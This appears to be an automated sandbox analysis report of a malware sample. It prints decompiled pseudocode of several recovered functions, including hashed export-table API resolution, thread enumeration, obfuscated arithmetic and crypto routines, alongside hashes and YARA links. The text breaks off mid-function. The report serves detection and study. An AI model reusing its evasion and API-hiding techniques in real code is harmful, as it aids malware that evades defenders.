Instruction Fuzzy Hash: 72E0D8B15406106BEE5036E55C0EFAE362D9B02652F000410FB0DED1C0F6525410C7F6

Uniqueness

Uniqueness Score: -1.00%

Function 6E886540, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 351memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00003037), ref: 6E8867F7

Strings

70, xrefs: 6E886547

Memory Dump Source

Source File: 00000004.00000002.2156747460.000000006E876000.00000020.00020000.sdmp, Offset: 6E876000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: 70
API String ID: 544645111-4144464487
Opcode ID: 5a0f0abeb2dc99b3ec5da8efba97e5b21ebea7edcffa78df852603c6d699d417
Instruction ID: 04bd24a7ce46f5b84c8853951277f3532774ae9b34fefdb67e82216fb7ac9664
Opcode Fuzzy Hash: 5a0f0abeb2dc99b3ec5da8efba97e5b21ebea7edcffa78df852603c6d699d417
Instruction Fuzzy Hash: 89F1B470E04865CFDB08CFACC2985397FB2F786306B40826AE46E97399D7345E45DB84

Uniqueness

Uniqueness Score: -1.00%

Function 6E86D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E86D770() {
				char _v22;

				GetConsoleCP();
				GetFileAttributesW(E6E857200(0x6e8705f8,  &_v22)); // executed
				return GetCapture();
			}

0x6e86d776
0x6e86d78e
0x6e86d798

APIs

GetConsoleCP.KERNEL32 ref: 6E86D776
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,6E85AE51), ref: 6E86D78E

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: c87057b47c3f927952656dff77c7f7469b22634b893589b3b15e9273362c3e1d
Instruction ID: 34722d076eab0600da84414c1a793cba6f69dc3898006fd2c2ae8e28317083d3
Opcode Fuzzy Hash: c87057b47c3f927952656dff77c7f7469b22634b893589b3b15e9273362c3e1d
Instruction Fuzzy Hash: 15D0C7B18405199BCE4077E8580DC6E376D5915116B454860ED1D55302F62B5568C7F6

Uniqueness

Uniqueness Score: -1.00%

Function 6E86B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E86B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E6E859D50(0xfef6f706);
				E6E85BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x6e872124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x6e86b1b4
0x6e86b1b7
0x6e86b1b9
0x6e86b1eb
0x00000000
0x6e86b1eb
0x6e86b1c0
0x6e86b1d6
0x6e86b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 6E86B1E7

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c41576a5e11746df19275cbcd3037807b642c1900d37ab7f3613b801ac7d382f
Instruction ID: 8297ff57a348bb6eb933a7fe124e84d99e38a8d947a3cdbc194abf9eddb7fd53
Opcode Fuzzy Hash: c41576a5e11746df19275cbcd3037807b642c1900d37ab7f3613b801ac7d382f
Instruction Fuzzy Hash: FFE0CD739452287BCA5126D4BC15F87379C4F06769F010C31FD1CA7254E641761086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E8669A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8669A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E6E859D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E6E8555C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E6E8555C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x6e8669b2
0x6e8669c1
0x6e8669ca
0x6e8669d9
0x6e8669de
0x6e8669e3
0x6e866a25
0x6e866a25
0x6e8669eb
0x6e8669eb
0x6e8669ef
0x6e8669f0
0x6e8669ff
0x6e866a04
0x6e866a11
0x6e866a1d
0x6e866a21
0x00000000
0x00000000
0x6e866a23
0x6e866a21
0x00000000
0x6e866a1d
0x00000000
0x6e8669f0
0x6e866a27
0x6e866a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 6E8669AD
GetCurrentProcessId.KERNEL32 ref: 6E8669C4
Thread32First.KERNEL32(00000000,?), ref: 6E8669D1
GetLastError.KERNEL32 ref: 6E8669F0
Thread32Next.KERNEL32(00000000,?), ref: 6E866A16

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: ba482ccf835012b540f47408c1bd8b174f37b03d621eee6cef78ce22d821457a
Instruction ID: 4df93d0e324adb3be92b6a827b289c0fcbd11ced2b6b74bf29c63419547f6599
Opcode Fuzzy Hash: ba482ccf835012b540f47408c1bd8b174f37b03d621eee6cef78ce22d821457a
Instruction Fuzzy Hash: 1F01F7729A03445BDB006BE89C86FEF3F2CEF52219F480C30E904E5241FA15D51482B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E85D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E6E85D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E6E8612D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E6E859D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E6E859D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E6E851460(_t205, E6E851460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E6E851460(0,  ~( *_t143), _v40));
							E6E851460(0,  *_t143, _a4);
							E6E868F20( &_v140, E6E859D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E6E86D680(0, _t91);
									_t176 = _t176 - E6E8522E0(0, 0, 1);
									E6E851460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E6E8600A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E6E851460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E6E859D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E6E8522E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E6E851460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E6E857DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E6E851460(__eflags, E6E8522E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E6E851460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E6E851460(__eflags, _t137, E6E859D50(0x3638cbc4));
										E6E851460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E6E857DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E6E859D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E6E857DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E6E857DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E6E8555A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x6e85d839
0x6e85d83c
0x6e85d83e
0x6e85d840
0x6e85d847
0x6e85d852
0x6e85d854
0x6e85d85b
0x6e85d860
0x6e85d862
0x6e85d865
0x6e85d86d
0x6e85d873
0x6e85d873
0x6e85d880
0x6e85d894
0x6e85d89f
0x6e85d8af
0x6e85d8b4
0x6e85d8bb
0x6e85d8be
0x6e85d8c4
0x6e85d8cc
0x6e85d8d0
0x6e85d8d2
0x6e85d8d5
0x6e85d8ea
0x6e85d8f0
0x6e85d90d
0x6e85d912
0x6e85d915
0x6e85d919
0x6e85d91b
0x6e85d920
0x6e85d92c
0x6e85d942
0x6e85d944
0x6e85d949
0x6e85d94c
0x6e85d950
0x6e85d920
0x6e85d954
0x6e85d95d
0x6e85d962
0x6e85d968
0x6e85d98d
0x6e85d9c4
0x6e85d9d0
0x6e85d9d8
0x6e85d9db
0x6e85d9e0
0x6e85d9e5
0x6e85d9e7
0x6e85d9ea
0x6e85d9ec
0x6e85d9f2
0x6e85d9fc
0x6e85d9fe
0x6e85da06
0x6e85da0e
0x6e85da11
0x6e85da16
0x6e85da19
0x6e85da1c
0x6e85da1e
0x6e85da20
0x6e85da22
0x6e85da24
0x6e85da24
0x6e85da2c
0x6e85da30
0x6e85da30
0x6e85da45
0x6e85da51
0x6e85da56
0x6e85da5b
0x6e85da61
0x6e85da65
0x6e85da68
0x6e85da68
0x6e85da30
0x6e85da83
0x6e85da88
0x6e85da9a
0x6e85daaa
0x6e85dab1
0x6e85dabe
0x6e85dac8
0x6e85dad7
0x6e85dae5
0x6e85daec
0x6e85daf3
0x6e85daf6
0x6e85db05
0x6e85db0c
0x6e85db11
0x6e85db14
0x6e85db16
0x6e85db54
0x6e85db18
0x6e85db1e
0x6e85db21
0x6e85db23
0x6e85db59
0x6e85db25
0x6e85db25
0x6e85db30
0x6e85db35
0x6e85db3a
0x6e85db44
0x6e85db47
0x6e85db4a
0x6e85db4b
0x6e85db4b
0x6e85db4f
0x6e85db4f
0x6e85db23
0x6e85db70
0x6e85db70
0x6e85d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x6e85d96a
0x6e85d973
0x6e85d974
0x6e85d977
0x6e85d97a
0x6e85d983
0x6e85d983
0x6e85d86d
0x6e85db72
0x6e85db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 6E85DB62
GetProcAddress.KERNEL32(00000000,?), ref: 6E85DB6A

Strings

l, xrefs: 6E85DAC8
d, xrefs: 6E85DAB1

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: dfb0b61d79deff579696e4f39ec0a20fa3be8396f3b38d20f6efd42ccdfc8115
Instruction ID: 5aed4fc3ff648ff4bfec3a6621d3bd905ef20b54c634746470af291cb8144474
Opcode Fuzzy Hash: dfb0b61d79deff579696e4f39ec0a20fa3be8396f3b38d20f6efd42ccdfc8115
Instruction Fuzzy Hash: 0E91FAB6D001159BDF508EE89C41AFF7779AF1635CF440864DC49B7381EF319A298BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E851A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E851A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x6e8720d8; // 0x53325ec4
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x6e851a06
0x6e851a0c
0x6e851a15
0x6e851a1d
0x6e851a39
0x6e851a47

APIs

CreateDialogParamW.USER32 ref: 6E851A1D
GetVersion.KERNEL32(?,6E858614,0000031F,?,6E856AB1,?,6E85AE51), ref: 6E851A39

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID:
API String ID: 1068622756-0
Opcode ID: 1d718505efe1237b66e35a4b6488b61728cedacaaaa587339ba8c37b9797f5f2
Instruction ID: 88e61a9f2c729f8bc46298c168814d5a7550c16149c0e05902ecc03fd258a1f0
Opcode Fuzzy Hash: 1d718505efe1237b66e35a4b6488b61728cedacaaaa587339ba8c37b9797f5f2
Instruction Fuzzy Hash: A2E092236139386B5A1089AF9CC8C9BFF9CDE521BA3020227BA4CD36A0D1514C08C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 6E86DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E86DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E6E86EC10();
				_v28 = E6E86EC10();
				_t549 = E6E86EC10();
				_v68 = E6E86EC10();
				_v40 = E6E86EC10();
				_v80 = E6E86EC10();
				_t304 = E6E86E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E6E86EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E6E851460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E6E8522E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E6E853F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E6E857D70(_a12, _t551);
							E6E857D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E6E86E320(_t584, 0x6e872028);
									_t425 = E6E851460(__eflags, E6E859D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E6E859D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E6E856BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E6E86E610(_v64, _t481);
									_t551 = _v28;
									E6E86E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E6E853F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E6E857D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E6E86EBC0();
										_push(_v68);
										E6E86EBC0();
										_push(_v40);
										E6E86EBC0();
										_push(_t463);
										E6E86EBC0();
										_push(_t584);
										E6E86EBC0();
										_push(_v80);
										return E6E86EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E6E863860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E6E851A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E6E851460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E6E851460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E6E8522E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E6E859D50(0x5413097) + _t338;
									E6E8522E0(__eflags, _v20, _t465);
									_t344 = E6E8522E0(__eflags, E6E851460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E6E851460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E6E851460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E6E8522E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E6E851460(__eflags, _t590 - 1, _v44);
										_t355 = E6E8513C0(E6E8522E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E6E863860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E6E851A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E6E852070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E6E851460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E6E853A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E6E852070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E6E852070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E6E852070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E6E851750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
